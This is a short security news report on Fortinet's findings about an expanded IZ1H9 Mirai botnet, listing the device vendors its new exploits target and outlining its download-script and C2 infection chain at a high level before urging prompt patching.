This significant evolution in the botnet was discovered during a new DDoS campaign when FortiGuard Labs observed a peak in vulnerability exploitation on September 6, with tens of thousands of triggers being used.
Fortinet reports that the botnet now utilizes 13 new exploit payloads, ranging from flaws discovered in 2015 to those found in 2023. Among these, four flaws target D-Link devices, eight target Geutebruck products, one targets the Netis WF2419, one targets Korenix JetWave routers, and one targets the Sunhillo SureLine application. Additionally, there are 12 exploits targeting TOTOLINK routers.
The infection process involves injecting the IZ1H9 payload into a device after exploiting one of the mentioned vulnerabilities. This payload contains a command that instructs the device to download a shell script downloader named “l.sh” from a specific URL. Once executed, the script deletes logs to hide any suspicious activity, retrieves bot clients compatible with different system architectures, and establishes communication with a C2 server to initiate various types of DDoS attacks.
Ultimately, it is crucial to address these vulnerabilities promptly to minimize the risks associated with device exposure. As the Mirai botnet continues to expand its arsenal of exploit triggers, timely application of security patches becomes increasingly important.